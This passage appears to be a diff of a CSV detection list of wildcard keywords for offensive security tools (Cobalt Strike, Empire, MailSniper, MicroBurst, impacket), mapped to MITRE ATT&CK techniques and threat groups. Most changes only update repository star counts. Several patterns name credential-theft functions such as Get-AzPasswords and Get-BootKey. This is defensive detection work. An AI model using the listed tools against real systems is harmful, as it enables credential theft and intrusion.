- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_virtual_Hook_address*","offensive_tool_keyword","cobaltstrike","A 
proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Get_WinPwn_Repo.sh*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Get-AccessTokenWithPRT*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-AclModificationRights*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-ActiveTCPConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens 
- Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*getAggressorClient*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getAllUserSpns*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential 
Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "*Get-ASREPHash*","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure 
security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of 
scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A 
collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" 
+"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-BeaconAPI*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*GetBearerToken.exe https://*.sharepoint.com*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 